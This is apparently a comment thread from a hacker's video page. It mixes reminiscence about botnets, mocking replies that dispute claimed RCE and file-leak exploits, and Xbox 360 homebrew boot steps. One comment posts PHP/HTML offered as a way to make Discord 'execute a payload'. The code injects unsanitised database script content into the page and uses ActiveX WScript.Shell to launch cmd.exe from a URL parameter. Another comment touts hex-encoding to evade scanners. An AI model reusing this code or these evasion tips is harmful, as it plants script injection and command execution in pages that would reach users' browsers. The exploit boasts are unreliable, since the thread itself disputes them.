I DO NOT HAVE A TWITTER ACCOUNT www.linkedin.com/in/clumsy/ www.t.me/SleepTheGod www.ClumsyLulz.medium.com www.SoundCloud.com/DoXeD www.Hackerone.com/DBMS www.Bugcrowd.com/Sleep www.Github.com/SleepTheGod
I'm EvKrev & Seteletaf - Pwnage21/oH nO uR ReDBaR/VioletTourist/CelticBrony/TheDarkPsalmist etc You have risen above your first teacher. Lol I remember giving you installs.
SleepTheGod, it is Celtic(not-a-brony)Brony from radio graffiti True Capitalist Radio, who was your old Xbox Live friend, who first taught you how to hack on a minuscule level. Just Botnet shit and Ratnet. Dude, it's 2024 and you're still hacking? Holy fuck I did that in 2007-2013. Yo man let's link up again. I could get discord. I would love to talk to you again. Shit hasn't been the same for me since the old days. I'm a poor man pirating vids on a laptop pan-handeling. I know damn well you remember me man, I started it all for you brother.
This is how you make discord on a windows system open then execute a payload without the uri this is why I use the browser version <?php // Database connection details $servername = "localhost"; $username = "your_username"; $password = "your_password"; $dbname = "your_database"; // Create connection $conn = new mysqli($servername, $username, $password, $dbname); // Check connection if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } // Fetch the script content from the database $sql = "SELECT script_content AS AlertMessage FROM scripts WHERE id = 1"; $result = $conn->query($sql); if ($result->num_rows > 0) { // Output data of each row $row = $result->fetch_assoc(); $script_content = $row["AlertMessage"]; } else { $script_content = "<script>alert('Script not found');</script>"; } $conn->close(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirecting...</title> <script> onload = function() { alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD"); }; function getQueryParam(param) { const urlParams = new URLSearchParams(window.location.search); return urlParams.get(param); } function isValidPayload(payload) { // Add validation logic for the payload, e.g., regex match const regex = /^[a-zA-Z0-9_-]+$/; // Example: alphanumeric, underscore, hyphen return regex.test(payload); } function openCmd() { try { var shell = new ActiveXObject("WScript.Shell"); shell.run("cmd.exe"); } catch (e) { alert("This action is not supported in this browser or is blocked for security reasons."); } } window.onload = function() { alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD"); const payload = getQueryParam('payload'); let targetUrl = 'discord.com/handoff'; if (payload && isValidPayload(payload)) { targetUrl += `?payload=${encodeURIComponent(payload)}`; if (payload === 'openCmd' && window.ActiveXObject) { openCmd(); } } setTimeout(function() { window.location.href = targetUrl; }, 3000); } </script> </head> <body> <p>If you are not redirected automatically, <a id="redirectLink" href="discord.com/handoff">click here</a>.</p> <script> const payload = getQueryParam('payload'); let targetUrl = 'discord.com/handoff'; if (payload && isValidPayload(payload)) { targetUrl += `?payload=${encodeURIComponent(payload)}`; if (payload === 'openCmd' && window.ActiveXObject) { openCmd(); } } document.getElementById('redirectLink').href = targetUrl; </script> <?php echo $script_content; // Inject the script content from the database ?> </body> </html>
what did i just watch... this aint no rce? 1. you leaked your linode ip addr. 2. close a bit of ur apps and ur tabs gawd damn. 3. how did u fumble an used port 💀 allowing it in ufw wont make it "not used"
Wow, man i've seen your github and you look like a master hacker! I even saw that you posted a PoC of steam RCE through their API!! I googled it too and didn't find anything about it, you must be really good if you find such Critical CVEs and doesn't even report them. And this w3schools exploit? Again, you probably are a god hacker! Since you've posted this on youtube, didn't report it ( since i again, could not find a CVE relating to this "vulnerability" ), and didn't even explain it! It's probably so complex!! RCE + LPE in the same exploit? wow, i guess they didn't know how to use docker then, n0obs! got pwned!
Isn't this just a docker container? They would not just execute your code on their main web server. How were you able to view the /etc/shadow without sudo
After sending a subscription message, the connection is disconnected after some time. The logs do not contain any explicit indication of the reason for the disconnection. Possible causes may be related to internal server errors or incorrect processing of web socket frames?
@@stripped This sequence looks like a set of random commands rather than a logically organized code, which can be the result of an error, intentional data corruption, or simply generating a random sequence of commands for analysis or testing.
@@stripped It's possibly not a honeypot, but it's still not a vulnerability. If it was actually a file being leaked, how is it that no other /etc files can be accessed? Stuff like passwd, issue, fstab? You can access /etc/resolv.conf, but it also contains the gcp internal address. This makes me think it's some kind of config file they copy when creating new servers... You're just salty you didn't get paid for running dirbuster
Unzip XellLaunch.zip Copy to Partition 3 \Apps\XellLaunch Unzip Xell-Launch-Shortcut.zip Copy to Partition 3 Content\0000000000000000\C0DE9999\00080000 Xell Launch should now appear under the Demo's section on the Xbox 360's dashboard. You will be able to boot directly in to Xell Reloaded (has HDMI support) from the Microsoft Dashboard. Download Xell Launch with Xell Reloaded Download Xell Launch Shortcut
You need aura 360 a jtag or rgh you need to burn a gentoo iso to a dvd dual air r+w you will also need excell 360 as well as www.poweriso.com/download.htm
It's probably an unintended debug api they left open. Hex encoding it means those enterprise scanners won't find it possibly. it only seems to have like 6 breaches though, not really that important
